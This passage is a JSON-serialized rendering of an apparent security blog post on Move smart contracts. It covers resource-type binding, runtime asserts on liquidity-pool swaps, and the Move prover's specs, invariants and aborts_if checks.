get_price",{"type":27,"tag":207,"props":14815,"children":14816},{"style":238},[14817],{"type":33,"value":1343},{"type":27,"tag":207,"props":14819,"children":14820},{"style":220},[14821],{"type":33,"value":14822},"type_info",{"type":27,"tag":207,"props":14824,"children":14825},{"style":226},[14826],{"type":33,"value":736},{"type":27,"tag":207,"props":14828,"children":14829},{"style":8920},[14830],{"type":33,"value":14831}," TypeInfo",{"type":27,"tag":207,"props":14833,"children":14834},{"style":238},[14835],{"type":33,"value":10416},{"type":27,"tag":207,"props":14837,"children":14838},{"style":226},[14839],{"type":33,"value":736},{"type":27,"tag":207,"props":14841,"children":14842},{"style":8920},[14843],{"type":33,"value":14844}," Decimal",{"type":27,"tag":207,"props":14846,"children":14847},{"style":220},[14848],{"type":33,"value":14849}," acquires",{"type":27,"tag":207,"props":14851,"children":14852},{"style":8920},[14853],{"type":33,"value":14854}," Oracle",{"type":27,"tag":207,"props":14856,"children":14857},{"style":238},[14858],{"type":33,"value":384},{"type":27,"tag":207,"props":14860,"children":14861},{"class":209,"line":270},[14862,14866,14871,14875,14880,14884,14889,14894,14899,14904],{"type":27,"tag":207,"props":14863,"children":14864},{"style":214},[14865],{"type":33,"value":10353},{"type":27,"tag":207,"props":14867,"children":14868},{"style":220},[14869],{"type":33,"value":14870}," oracle",{"type":27,"tag":207,"props":14872,"children":14873},{"style":226},[14874],{"type":33,"value":229},{"type":27,"tag":207,"props":14876,"children":14877},{"style":220},[14878],{"type":33,"value":14879}," borrow_global_mut",{"type":27,"tag":207,"props":14881,"children":14882},{"style":238},[14883],{"type":33,"value":9257},{"type":27,"tag":207,"props":14885,"children":14886},{"style":8920},[14887],{"type":33,"value":14888},"Oracle",{"type":27,"tag":207,"props":14890,"children":14891},{"style":238},[14892],{"type":33,"value":14893},">(",{"type":27,"tag":207,"props":14895,"children":14896},{"style":226},[14897],{"type":33,"value":14898},"@",{"type":27,"tag":207,"props":14900,"children":14901},{"style":220},[14902],{"type":33,"value":14903},"oracle",{"type":27,"tag":207,"props":14905,"children":14906},{"style":238},[14907],{"type":33,"value":1455},{"type":27,"tag":207,"props":14909,"children":14910},{"class":209,"line":296},[14911,14915,14920,14924,14929,14933,14938,14942,14947,14951,14956],{"type":27,"tag":207,"props":14912,"children":14913},{"style":214},[14914],{"type":33,"value":10353},{"type":27,"tag":207,"props":14916,"children":14917},{"style":220},[14918],{"type":33,"value":14919}," price",{"type":27,"tag":207,"props":14921,"children":14922},{"style":226},[14923],{"type":33,"value":229},{"type":27,"tag":207,"props":14925,"children":14926},{"style":238},[14927],{"type":33,"value":14928}," table",{"type":27,"tag":207,"props":14930,"children":14931},{"style":226},[14932],{"type":33,"value":10768},{"type":27,"tag":207,"props":14934,"children":14935},{"style":220},[14936],{"type":33,"value":14937},"borrow_mut_with_default",{"type":27,"tag":207,"props":14939,"children":14940},{"style":238},[14941],{"type":33,"value":9257},{"type":27,"tag":207,"props":14943,"children":14944},{"style":8920},[14945],{"type":33,"value":14946},"TypeInfo",{"type":27,"tag":207,"props":14948,"children":14949},{"style":238},[14950],{"type":33,"value":1123},{"type":27,"tag":207,"props":14952,"children":14953},{"style":8920},[14954],{"type":33,"value":14955},"Decimal",{"type":27,"tag":207,"props":14957,"children":14958},{"style":238},[14959],{"type":33,"value":13870},{"type":27,"tag":207,"props":14961,"children":14962},{"class":209,"line":445},[14963,14968,14972,14976,14980],{"type":27,"tag":207,"props":14964,"children":14965},{"style":226},[14966],{"type":33,"value":14967}," &",{"type":27,"tag":207,"props":14969,"children":14970},{"style":214},[14971],{"type":33,"value":11009},{"type":27,"tag":207,"props":14973,"children":14974},{"style":220},[14975],{"type":33,"value":14870},{"type":27,"tag":207,"props":14977,"children":14978},{"style":226},[14979],{"type":33,"value":1041},{"type":27,"tag":207,"props":14981,"children":14982},{"style":238},[14983],{"type":33,"value":14984},"prices,\n",{"type":27,"tag":207,"props":14986,"children":14987},{"class":209,"line":867},[14988,14993],{"type":27,"tag":207,"props":14989,"children":14990},{"style":220},[14991],{"type":33,"value":14992}," type_info",{"type":27,"tag":207,"props":14994,"children":14995},{"style":238},[14996],{"type":33,"value":1842},{"type":27,"tag":207,"props":14998,"children":14999},{"class":209,"line":892},[15000,15005,15009,15014],{"type":27,"tag":207,"props":15001,"children":15002},{"style":238},[15003],{"type":33,"value":15004}," decimal",{"type":27,"tag":207,"props":15006,"children":15007},{"style":226},[15008],{"type":33,"value":10768},{"type":27,"tag":207,"props":15010,"children":15011},{"style":1335},[15012],{"type":33,"value":15013},"one",{"type":27,"tag":207,"props":15015,"children":15016},{"style":238},[15017],{"type":33,"value":15018},"()\n",{"type":27,"tag":207,"props":15020,"children":15021},{"class":209,"line":1475},[15022],{"type":27,"tag":207,"props":15023,"children":15024},{"style":238},[15025],{"type":33,"value":15026}," );\n",{"type":27,"tag":207,"props":15028,"children":15029},{"class":209,"line":2065},[15030,15035],{"type":27,"tag":207,"props":15031,"children":15032},{"style":226},[15033],{"type":33,"value":15034}," *",{"type":27,"tag":207,"props":15036,"children":15037},{"style":220},[15038],{"type":33,"value":15039},"price\n",{"type":27,"tag":207,"props":15041,"children":15042},{"class":209,"line":2092},[15043],{"type":27,"tag":207,"props":15044,"children":15045},{"style":238},[15046],{"type":33,"value":10645},{"type":27,"tag":36,"props":15048,"children":15049},{},[15050,15052,15057],{"type":33,"value":15051},"Type association feels like a proxy for the intended pattern -- associating resources with instances. It's very useful being able to store a reference to an ",{"type":27,"tag":942,"props":15053,"children":15054},{},[15055],{"type":33,"value":15056},"instance",{"type":33,"value":15058}," of another resource (which is possible in Diem style move).",{"type":27,"tag":36,"props":15060,"children":15061},{},[15062],{"type":33,"value":15063},"In summary, when using type systems to bind resources to each other, it's important to either",{"type":27,"tag":12719,"props":15065,"children":15066},{},[15067,15072],{"type":27,"tag":1232,"props":15068,"children":15069},{},[15070],{"type":33,"value":15071},"Have unique initializers for your resources",{"type":27,"tag":1232,"props":15073,"children":15074},{},[15075],{"type":33,"value":15076},"Associate resources with instances directly",{"type":27,"tag":28,"props":15078,"children":15080},{"id":15079},"formal-verification",[15081],{"type":33,"value":15082},"Formal Verification",{"type":27,"tag":36,"props":15084,"children":15085},{},[15086],{"type":33,"value":15087},"Formal verification is another exciting feature.",{"type":27,"tag":36,"props":15089,"children":15090},{},[15091],{"type":33,"value":15092},"As part of our work with protocols, we actively use formal verification to prove aspects of security.",{"type":27,"tag":36,"props":15094,"children":15095},{},[15096,15098,15103],{"type":33,"value":15097},"However, this isn't a silver bullet. The key is figuring out ",{"type":27,"tag":942,"props":15099,"children":15100},{},[15101],{"type":33,"value":15102},"what",{"type":33,"value":15104}," to prove.",{"type":27,"tag":36,"props":15106,"children":15107},{},[15108,15110,15117],{"type":33,"value":15109},"One obvious idea might be a properties across a particular function. For example, we might want to ensure that a swap doesn't reduce the value of the pool -- similar to the ",{"type":27,"tag":47,"props":15111,"children":15114},{"href":15112,"rel":15113},"https://osec.io/blog/reports/2022-04-26-spl-swap-rounding/",[51],[15115],{"type":33,"value":15116},"Solana AMM rounding issue",{"type":33,"value":15118}," we reported.",{"type":27,"tag":36,"props":15120,"children":15121},{},[15122],{"type":33,"value":15123},"However, this could also be checked with a simple runtime assert. For example, we recommended Pontem assert that liquidity pool token values are strictly increasing.",{"type":27,"tag":101,"props":15125,"children":15127},{"className":10270,"code":15126,"language":10269,"meta":7,"style":7}," let cmp = u256::compare(&lp_value_after_swap_and_fee, &lp_value_before_swap_u256);\n assert!(cmp == 2, ERR_INCORRECT_SWAP);\n",[15128],{"type":27,"tag":84,"props":15129,"children":15130},{"__ignoreMap":7},[15131,15191],{"type":27,"tag":207,"props":15132,"children":15133},{"class":209,"line":210},[15134,15138,15143,15147,15152,15156,15161,15165,15169,15174,15178,15182,15187],{"type":27,"tag":207,"props":15135,"children":15136},{"style":214},[15137],{"type":33,"value":425},{"type":27,"tag":207,"props":15139,"children":15140},{"style":220},[15141],{"type":33,"value":15142}," cmp",{"type":27,"tag":207,"props":15144,"children":15145},{"style":226},[15146],{"type":33,"value":229},{"type":27,"tag":207,"props":15148,"children":15149},{"style":238},[15150],{"type":33,"value":15151}," u256",{"type":27,"tag":207,"props":15153,"children":15154},{"style":226},[15155],{"type":33,"value":10768},{"type":27,"tag":207,"props":15157,"children":15158},{"style":1335},[15159],{"type":33,"value":15160},"compare",{"type":27,"tag":207,"props":15162,"children":15163},{"style":238},[15164],{"type":33,"value":1343},{"type":27,"tag":207,"props":15166,"children":15167},{"style":226},[15168],{"type":33,"value":10398},{"type":27,"tag":207,"props":15170,"children":15171},{"style":220},[15172],{"type":33,"value":15173},"lp_value_after_swap_and_fee",{"type":27,"tag":207,"props":15175,"children":15176},{"style":238},[15177],{"type":33,"value":1123},{"type":27,"tag":207,"props":15179,"children":15180},{"style":226},[15181],{"type":33,"value":10398},{"type":27,"tag":207,"props":15183,"children":15184},{"style":220},[15185],{"type":33,"value":15186},"lp_value_before_swap_u256",{"type":27,"tag":207,"props":15188,"children":15189},{"style":238},[15190],{"type":33,"value":1455},{"type":27,"tag":207,"props":15192,"children":15193},{"class":209,"line":244},[15194,15199,15203,15208,15212,15216],{"type":27,"tag":207,"props":15195,"children":15196},{"style":1335},[15197],{"type":33,"value":15198}," assert!",{"type":27,"tag":207,"props":15200,"children":15201},{"style":238},[15202],{"type":33,"value":1343},{"type":27,"tag":207,"props":15204,"children":15205},{"style":220},[15206],{"type":33,"value":15207},"cmp",{"type":27,"tag":207,"props":15209,"children":15210},{"style":226},[15211],{"type":33,"value":10572},{"type":27,"tag":207,"props":15213,"children":15214},{"style":232},[15215],{"type":33,"value":438},{"type":27,"tag":207,"props":15217,"children":15218},{"style":238},[15219],{"type":33,"value":15220},", ERR_INCORRECT_SWAP);\n",{"type":27,"tag":36,"props":15222,"children":15223},{},[15224,15226,15231],{"type":33,"value":15225},"The move prover really shines when we're proving relationships ",{"type":27,"tag":942,"props":15227,"children":15228},{},[15229],{"type":33,"value":15230},"between",{"type":33,"value":15232}," functions.",{"type":27,"tag":36,"props":15234,"children":15235},{},[15236,15238,15244],{"type":33,"value":15237},"One example of a more complicated relationship that can't be proved easily via assertions would be the ",{"type":27,"tag":84,"props":15239,"children":15241},{"className":15240},[],[15242],{"type":33,"value":15243},"no_free_money_theorem",{"type":33,"value":15245}," in the move repository.",{"type":27,"tag":101,"props":15247,"children":15249},{"className":10270,"code":15248,"language":10269,"meta":7,"style":7}," // #[test] // TODO: cannot specify the test-only functions\n fun no_free_money_theorem(coin1_in: u64, coin2_in: u64): (u64, u64) acquires Pool {\n let share = add_liquidity(coin1_in, coin2_in);\n remove_liquidity(share)\n }\n spec no_free_money_theorem {\n pragma verify=false;\n ensures result_1 \u003C= coin1_in;\n ensures result_2 \u003C= coin2_in;\n }\n",[15250],{"type":27,"tag":84,"props":15251,"children":15252},{"__ignoreMap":7},[15253,15261,15349,15391,15412,15419,15435,15461,15488,15513],{"type":27,"tag":207,"props":15254,"children":15255},{"class":209,"line":210},[15256],{"type":27,"tag":207,"props":15257,"children":15258},{"style":4647},[15259],{"type":33,"value":15260}," // #[test] // TODO: cannot specify the test-only functions\n",{"type":27,"tag":207,"props":15262,"children":15263},{"class":209,"line":244},[15264,15268,15273,15277,15282,15286,15290,15294,15299,15303,15307,15311,15315,15319,15324,15328,15332,15336,15340,15345],{"type":27,"tag":207,"props":15265,"children":15266},{"style":220},[15267],{"type":33,"value":13851},{"type":27,"tag":207,"props":15269,"children":15270},{"style":1335},[15271],{"type":33,"value":15272}," no_free_money_theorem",{"type":27,"tag":207,"props":15274,"children":15275},{"style":238},[15276],{"type":33,"value":1343},{"type":27,"tag":207,"props":15278,"children":15279},{"style":220},[15280],{"type":33,"value":15281},"coin1_in",{"type":27,"tag":207,"props":15283,"children":15284},{"style":226},[15285],{"type":33,"value":736},{"type":27,"tag":207,"props":15287,"children":15288},{"style":8920},[15289],{"type":33,"value":13142},{"type":27,"tag":207,"props":15291,"children":15292},{"style":238},[15293],{"type":33,"value":1123},{"type":27,"tag":207,"props":15295,"children":15296},{"style":220},[15297],{"type":33,"value":15298},"coin2_in",{"type":27,"tag":207,"props":15300,"children":15301},{"style":226},[15302],{"type":33,"value":736},{"type":27,"tag":207,"props":15304,"children":15305},{"style":8920},[15306],{"type":33,"value":13142},{"type":27,"tag":207,"props":15308,"children":15309},{"style":238},[15310],{"type":33,"value":10416},{"type":27,"tag":207,"props":15312,"children":15313},{"style":226},[15314],{"type":33,"value":736},{"type":27,"tag":207,"props":15316,"children":15317},{"style":238},[15318],{"type":33,"value":686},{"type":27,"tag":207,"props":15320,"children":15321},{"style":8920},[15322],{"type":33,"value":15323},"u64",{"type":27,"tag":207,"props":15325,"children":15326},{"style":238},[15327],{"type":33,"value":1123},{"type":27,"tag":207,"props":15329,"children":15330},{"style":8920},[15331],{"type":33,"value":15323},{"type":27,"tag":207,"props":15333,"children":15334},{"style":238},[15335],{"type":33,"value":2222},{"type":27,"tag":207,"props":15337,"children":15338},{"style":220},[15339],{"type":33,"value":13626},{"type":27,"tag":207,"props":15341,"children":15342},{"style":8920},[15343],{"type":33,"value":15344}," Pool",{"type":27,"tag":207,"props":15346,"children":15347},{"style":238},[15348],{"type":33,"value":384},{"type":27,"tag":207,"props":15350,"children":15351},{"class":209,"line":270},[15352,15357,15362,15366,15371,15375,15379,15383,15387],{"type":27,"tag":207,"props":15353,"children":15354},{"style":214},[15355],{"type":33,"value":15356}," let",{"type":27,"tag":207,"props":15358,"children":15359},{"style":220},[15360],{"type":33,"value":15361}," share",{"type":27,"tag":207,"props":15363,"children":15364},{"style":226},[15365],{"type":33,"value":229},{"type":27,"tag":207,"props":15367,"children":15368},{"style":1335},[15369],{"type":33,"value":15370}," add_liquidity",{"type":27,"tag":207,"props":15372,"children":15373},{"style":238},[15374],{"type":33,"value":1343},{"type":27,"tag":207,"props":15376,"children":15377},{"style":220},[15378],{"type":33,"value":15281},{"type":27,"tag":207,"props":15380,"children":15381},{"style":238},[15382],{"type":33,"value":1123},{"type":27,"tag":207,"props":15384,"children":15385},{"style":220},[15386],{"type":33,"value":15298},{"type":27,"tag":207,"props":15388,"children":15389},{"style":238},[15390],{"type":33,"value":1455},{"type":27,"tag":207,"props":15392,"children":15393},{"class":209,"line":296},[15394,15399,15403,15408],{"type":27,"tag":207,"props":15395,"children":15396},{"style":1335},[15397],{"type":33,"value":15398}," remove_liquidity",{"type":27,"tag":207,"props":15400,"children":15401},{"style":238},[15402],{"type":33,"value":1343},{"type":27,"tag":207,"props":15404,"children":15405},{"style":220},[15406],{"type":33,"value":15407},"share",{"type":27,"tag":207,"props":15409,"children":15410},{"style":238},[15411],{"type":33,"value":10449},{"type":27,"tag":207,"props":15413,"children":15414},{"class":209,"line":445},[15415],{"type":27,"tag":207,"props":15416,"children":15417},{"style":238},[15418],{"type":33,"value":5312},{"type":27,"tag":207,"props":15420,"children":15421},{"class":209,"line":867},[15422,15427,15431],{"type":27,"tag":207,"props":15423,"children":15424},{"style":220},[15425],{"type":33,"value":15426}," spec",{"type":27,"tag":207,"props":15428,"children":15429},{"style":220},[15430],{"type":33,"value":15272},{"type":27,"tag":207,"props":15432,"children":15433},{"style":238},[15434],{"type":33,"value":384},{"type":27,"tag":207,"props":15436,"children":15437},{"class":209,"line":892},[15438,15443,15448,15452,15457],{"type":27,"tag":207,"props":15439,"children":15440},{"style":220},[15441],{"type":33,"value":15442}," pragma",{"type":27,"tag":207,"props":15444,"children":15445},{"style":220},[15446],{"type":33,"value":15447}," verify",{"type":27,"tag":207,"props":15449,"children":15450},{"style":226},[15451],{"type":33,"value":10380},{"type":27,"tag":207,"props":15453,"children":15454},{"style":214},[15455],{"type":33,"value":15456},"false",{"type":27,"tag":207,"props":15458,"children":15459},{"style":238},[15460],{"type":33,"value":241},{"type":27,"tag":207,"props":15462,"children":15463},{"class":209,"line":1475},[15464,15469,15474,15479,15484],{"type":27,"tag":207,"props":15465,"children":15466},{"style":220},[15467],{"type":33,"value":15468}," ensures",{"type":27,"tag":207,"props":15470,"children":15471},{"style":220},[15472],{"type":33,"value":15473}," result_1",{"type":27,"tag":207,"props":15475,"children":15476},{"style":226},[15477],{"type":33,"value":15478}," \u003C=",{"type":27,"tag":207,"props":15480,"children":15481},{"style":220},[15482],{"type":33,"value":15483}," coin1_in",{"type":27,"tag":207,"props":15485,"children":15486},{"style":238},[15487],{"type":33,"value":241},{"type":27,"tag":207,"props":15489,"children":15490},{"class":209,"line":2065},[15491,15495,15500,15504,15509],{"type":27,"tag":207,"props":15492,"children":15493},{"style":220},[15494],{"type":33,"value":15468},{"type":27,"tag":207,"props":15496,"children":15497},{"style":220},[15498],{"type":33,"value":15499}," result_2",{"type":27,"tag":207,"props":15501,"children":15502},{"style":226},[15503],{"type":33,"value":15478},{"type":27,"tag":207,"props":15505,"children":15506},{"style":220},[15507],{"type":33,"value":15508}," coin2_in",{"type":27,"tag":207,"props":15510,"children":15511},{"style":238},[15512],{"type":33,"value":241},{"type":27,"tag":207,"props":15514,"children":15515},{"class":209,"line":2092},[15516],{"type":27,"tag":207,"props":15517,"children":15518},{"style":238},[15519],{"type":33,"value":5312},{"type":27,"tag":36,"props":15521,"children":15522},{},[15523],{"type":33,"value":15524},"There's no clean way to express this with an assert because this makes an observation across two functions which are temporally separated.",{"type":27,"tag":36,"props":15526,"children":15527},{},[15528,15530,15535],{"type":33,"value":15529},"Invariant's are also extremely useful. For example, enforcing invariants about fee parameters (fee can never be greater than 100%) or pool supply makes it a ",{"type":27,"tag":942,"props":15531,"children":15532},{},[15533],{"type":33,"value":15534},"lot",{"type":33,"value":15536}," easier to reason about the protocol.",{"type":27,"tag":36,"props":15538,"children":15539},{},[15540],{"type":33,"value":15541},"For example, Ian uses invariants to clearly define core properties of his AMM state.",{"type":27,"tag":101,"props":15543,"children":15545},{"className":10270,"code":15544,"language":10269,"meta":7,"style":7},"spec PoolState {\n invariant supply >= MINIMUM_LIQUIDITY;\n}\n",[15546],{"type":27,"tag":84,"props":15547,"children":15548},{"__ignoreMap":7},[15549,15566,15589],{"type":27,"tag":207,"props":15550,"children":15551},{"class":209,"line":210},[15552,15557,15562],{"type":27,"tag":207,"props":15553,"children":15554},{"style":220},[15555],{"type":33,"value":15556},"spec",{"type":27,"tag":207,"props":15558,"children":15559},{"style":8920},[15560],{"type":33,"value":15561}," PoolState",{"type":27,"tag":207,"props":15563,"children":15564},{"style":238},[15565],{"type":33,"value":384},{"type":27,"tag":207,"props":15567,"children":15568},{"class":209,"line":244},[15569,15574,15579,15584],{"type":27,"tag":207,"props":15570,"children":15571},{"style":220},[15572],{"type":33,"value":15573}," invariant",{"type":27,"tag":207,"props":15575,"children":15576},{"style":220},[15577],{"type":33,"value":15578}," supply",{"type":27,"tag":207,"props":15580,"children":15581},{"style":226},[15582],{"type":33,"value":15583}," >=",{"type":27,"tag":207,"props":15585,"children":15586},{"style":238},[15587],{"type":33,"value":15588}," MINIMUM_LIQUIDITY;\n",{"type":27,"tag":207,"props":15590,"children":15591},{"class":209,"line":270},[15592],{"type":27,"tag":207,"props":15593,"children":15594},{"style":238},[15595],{"type":33,"value":451},{"type":27,"tag":36,"props":15597,"children":15598},{},[15599,15601,15607,15609,15615],{"type":33,"value":15600},"Another useful pattern for the Move prover is ",{"type":27,"tag":84,"props":15602,"children":15604},{"className":15603},[],[15605],{"type":33,"value":15606},"aborts_if",{"type":33,"value":15608},". More specifically, it can be very helpful to assert that a function never aborts, with ",{"type":27,"tag":84,"props":15610,"children":15612},{"className":15611},[],[15613],{"type":33,"value":15614},"aborts_if false",{"type":33,"value":1041},{"type":27,"tag":36,"props":15617,"children":15618},{},[15619],{"type":33,"value":15620},"Although loop invariants are a bit clunky, Ian is also able to prove that a relatively nontrivial function doesn't abort.",{"type":27,"tag":101,"props":15622,"children":15624},{"className":10270,"code":15623,"language":10269,"meta":7,"style":7}," fun multiply_vec_by_n_coins(input: vector\u003Cu64>): vector\u003Cu128> {\n let amounts_times_coins = vector::empty\u003Cu128>();\n let i = 0;\n let n_coins = vector::length(&input);\n while ({\n spec {\n invariant len(amounts_times_coins) == i;\n invariant i \u003C= n_coins;\n invariant forall j in 0..i: amounts_times_coins[j] == input[j] * n_coins;\n };\n (i \u003C n_coins)\n }) {\n vector::push_back(\n &mut amounts_times_coins,\n (*vector::borrow(&input, (i as u64)) as u128) * (n_coins as u128)\n );\n i = i + 1;\n };\n spec {\n assert i == n_coins;\n assert len(input) == n_coins;\n };\n amounts_times_coins\n }\n spec multiply_vec_by_n_coins {\n pragma opaque;\n aborts_if false;\n ensures len(result) == len(input);\n ensures forall j in 0..len(input): result[j] == input[j] * len(input);\n }\n",[15625],{"type":27,"tag":84,"props":15626,"children":15627},{"__ignoreMap":7},[15628,15692,15734,15757,15801,15814,15826,15865,15888,15976,15984,16008,16016,16037,16057,16157,16165,16193,16201,16213,16237,16272,16279,16287,16294,16309,16325,16342,16385,16489],{"type":27,"tag":207,"props":15629,"children":15630},{"class":209,"line":210},[15631,15635,15640,15644,15649,15653,15658,15662,15666,15671,15675,15679,15683,15688],{"type":27,"tag":207,"props":15632,"children":15633},{"style":220},[15634],{"type":33,"value":13851},{"type":27,"tag":207,"props":15636,"children":15637},{"style":1335},[15638],{"type":33,"value":15639}," multiply_vec_by_n_coins",{"type":27,"tag":207,"props":15641,"children":15642},{"style":238},[15643],{"type":33,"value":1343},{"type":27,"tag":207,"props":15645,"children":15646},{"style":220},[15647],{"type":33,"value":15648},"input",{"type":27,"tag":207,"props":15650,"children":15651},{"style":226},[15652],{"type":33,"value":736},{"type":27,"tag":207,"props":15654,"children":15655},{"style":220},[15656],{"type":33,"value":15657}," vector",{"type":27,"tag":207,"props":15659,"children":15660},{"style":238},[15661],{"type":33,"value":9257},{"type":27,"tag":207,"props":15663,"children":15664},{"style":8920},[15665],{"type":33,"value":15323},{"type":27,"tag":207,"props":15667,"children":15668},{"style":238},[15669],{"type":33,"value":15670},">)",{"type":27,"tag":207,"props":15672,"children":15673},{"style":226},[15674],{"type":33,"value":736},{"type":27,"tag":207,"props":15676,"children":15677},{"style":220},[15678],{"type":33,"value":15657},{"type":27,"tag":207,"props":15680,"children":15681},{"style":238},[15682],{"type":33,"value":9257},{"type":27,"tag":207,"props":15684,"children":15685},{"style":8920},[15686],{"type":33,"value":15687},"u128",{"type":27,"tag":207,"props":15689,"children":15690},{"style":238},[15691],{"type":33,"value":14563},{"type":27,"tag":207,"props":15693,"children":15694},{"class":209,"line":244},[15695,15699,15704,15708,15712,15716,15721,15725,15729],{"type":27,"tag":207,"props":15696,"children":15697},{"style":214},[15698],{"type":33,"value":15356},{"type":27,"tag":207,"props":15700,"children":15701},{"style":220},[15702],{"type":33,"value":15703}," amounts_times_coins",{"type":27,"tag":207,"props":15705,"children":15706},{"style":226},[15707],{"type":33,"value":229},{"type":27,"tag":207,"props":15709,"children":15710},{"style":238},[15711],{"type":33,"value":15657},{"type":27,"tag":207,"props":15713,"children":15714},{"style":226},[15715],{"type":33,"value":10768},{"type":27,"tag":207,"props":15717,"children":15718},{"style":220},[15719],{"type":33,"value":15720},"empty",{"type":27,"tag":207,"props":15722,"children":15723},{"style":238},[15724],{"type":33,"value":9257},{"type":27,"tag":207,"props":15726,"children":15727},{"style":8920},[15728],{"type":33,"value":15687},{"type":27,"tag":207,"props":15730,"children":15731},{"style":238},[15732],{"type":33,"value":15733},">();\n",{"type":27,"tag":207,"props":15735,"children":15736},{"class":209,"line":270},[15737,15741,15745,15749,15753],{"type":27,"tag":207,"props":15738,"children":15739},{"style":214},[15740],{"type":33,"value":15356},{"type":27,"tag":207,"props":15742,"children":15743},{"style":220},[15744],{"type":33,"value":4671},{"type":27,"tag":207,"props":15746,"children":15747},{"style":226},[15748],{"type":33,"value":229},{"type":27,"tag":207,"props":15750,"children":15751},{"style":232},[15752],{"type":33,"value":4680},{"type":27,"tag":207,"props":15754,"children":15755},{"style":238},[15756],{"type":33,"value":241},{"type":27,"tag":207,"props":15758,"children":15759},{"class":209,"line":296},[15760,15764,15769,15773,15777,15781,15785,15789,15793,15797],{"type":27,"tag":207,"props":15761,"children":15762},{"style":214},[15763],{"type":33,"value":15356},{"type":27,"tag":207,"props":15765,"children":15766},{"style":220},[15767],{"type":33,"value":15768}," n_coins",{"type":27,"tag":207,"props":15770,"children":15771},{"style":226},[15772],{"type":33,"value":229},{"type":27,"tag":207,"props":15774,"children":15775},{"style":238},[15776],{"type":33,"value":15657},{"type":27,"tag":207,"props":15778,"children":15779},{"style":226},[15780],{"type":33,"value":10768},{"type":27,"tag":207,"props":15782,"children":15783},{"style":1335},[15784],{"type":33,"value":9476},{"type":27,"tag":207,"props":15786,"children":15787},{"style":238},[15788],{"type":33,"value":1343},{"type":27,"tag":207,"props":15790,"children":15791},{"style":226},[15792],{"type":33,"value":10398},{"type":27,"tag":207,"props":15794,"children":15795},{"style":220},[15796],{"type":33,"value":15648},{"type":27,"tag":207,"props":15798,"children":15799},{"style":238},[15800],{"type":33,"value":1455},{"type":27,"tag":207,"props":15802,"children":15803},{"class":209,"line":445},[15804,15809],{"type":27,"tag":207,"props":15805,"children":15806},{"style":376},[15807],{"type":33,"value":15808}," while",{"type":27,"tag":207,"props":15810,"children":15811},{"style":238},[15812],{"type":33,"value":15813}," ({\n",{"type":27,"tag":207,"props":15815,"children":15816},{"class":209,"line":867},[15817,15822],{"type":27,"tag":207,"props":15818,"children":15819},{"style":220},[15820],{"type":33,"value":15821}," spec",{"type":27,"tag":207,"props":15823,"children":15824},{"style":238},[15825],{"type":33,"value":384},{"type":27,"tag":207,"props":15827,"children":15828},{"class":209,"line":892},[15829,15834,15839,15843,15848,15852,15857,15861],{"type":27,"tag":207,"props":15830,"children":15831},{"style":220},[15832],{"type":33,"value":15833}," invariant",{"type":27,"tag":207,"props":15835,"children":15836},{"style":1335},[15837],{"type":33,"value":15838}," len",{"type":27,"tag":207,"props":15840,"children":15841},{"style":238},[15842],{"type":33,"value":1343},{"type":27,"tag":207,"props":15844,"children":15845},{"style":220},[15846],{"type":33,"value":15847},"amounts_times_coins",{"type":27,"tag":207,"props":15849,"children":15850},{"style":238},[15851],{"type":33,"value":2222},{"type":27,"tag":207,"props":15853,"children":15854},{"style":226},[15855],{"type":33,"value":15856},"==",{"type":27,"tag":207,"props":15858,"children":15859},{"style":220},[15860],{"type":33,"value":4671},{"type":27,"tag":207,"props":15862,"children":15863},{"style":238},[15864],{"type":33,"value":241},{"type":27,"tag":207,"props":15866,"children":15867},{"class":209,"line":1475},[15868,15872,15876,15880,15884],{"type":27,"tag":207,"props":15869,"children":15870},{"style":220},[15871],{"type":33,"value":15833},{"type":27,"tag":207,"props":15873,"children":15874},{"style":220},[15875],{"type":33,"value":4671},{"type":27,"tag":207,"props":15877,"children":15878},{"style":226},[15879],{"type":33,"value":15478},{"type":27,"tag":207,"props":15881,"children":15882},{"style":220},[15883],{"type":33,"value":15768},{"type":27,"tag":207,"props":15885,"children":15886},{"style":238},[15887],{"type":33,"value":241},{"type":27,"tag":207,"props":15889,"children":15890},{"class":209,"line":2065},[15891,15895,15900,15905,15909,15913,15917,15921,15925,15929,15933,15938,15943,15947,15952,15956,15960,15964,15968,15972],{"type":27,"tag":207,"props":15892,"children":15893},{"style":220},[15894],{"type":33,"value":15833},{"type":27,"tag":207,"props":15896,"children":15897},{"style":220},[15898],{"type":33,"value":15899}," forall",{"type":27,"tag":207,"props":15901,"children":15902},{"style":220},[15903],{"type":33,"value":15904}," j",{"type":27,"tag":207,"props":15906,"children":15907},{"style":214},[15908],{"type":33,"value":10331},{"type":27,"tag":207,"props":15910,"children":15911},{"style":232},[15912],{"type":33,"value":4680},{"type":27,"tag":207,"props":15914,"children":15915},{"style":226},[15916],{"type":33,"value":10340},{"type":27,"tag":207,"props":15918,"children":15919},{"style":220},[15920],{"type":33,"value":4690},{"type":27,"tag":207,"props":15922,"children":15923},{"style":226},[15924],{"type":33,"value":736},{"type":27,"tag":207,"props":15926,"children":15927},{"style":220},[15928],{"type":33,"value":15703},{"type":27,"tag":207,"props":15930,"children":15931},{"style":238},[15932],{"type":33,"value":11019},{"type":27,"tag":207,"props":15934,"children":15935},{"style":220},[15936],{"type":33,"value":15937},"j",{"type":27,"tag":207,"props":15939,"children":15940},{"style":238},[15941],{"type":33,"value":15942},"] ",{"type":27,"tag":207,"props":15944,"children":15945},{"style":226},[15946],{"type":33,"value":15856},{"type":27,"tag":207,"props":15948,"children":15949},{"style":220},[15950],{"type":33,"value":15951}," input",{"type":27,"tag":207,"props":15953,"children":15954},{"style":238},[15955],{"type":33,"value":11019},{"type":27,"tag":207,"props":15957,"children":15958},{"style":220},[15959],{"type":33,"value":15937},{"type":27,"tag":207,"props":15961,"children":15962},{"style":238},[15963],{"type":33,"value":15942},{"type":27,"tag":207,"props":15965,"children":15966},{"style":226},[15967],{"type":33,"value":9286},{"type":27,"tag":207,"props":15969,"children":15970},{"style":220},[15971],{"type":33,"value":15768},{"type":27,"tag":207,"props":15973,"children":15974},{"style":238},[15975],{"type":33,"value":241},{"type":27,"tag":207,"props":15977,"children":15978},{"class":209,"line":2092},[15979],{"type":27,"tag":207,"props":15980,"children":15981},{"style":238},[15982],{"type":33,"value":15983}," };\n",{"type":27,"tag":207,"props":15985,"children":15986},{"class":209,"line":2130},[15987,15992,15996,16000,16004],{"type":27,"tag":207,"props":15988,"children":15989},{"style":238},[15990],{"type":33,"value":15991}," 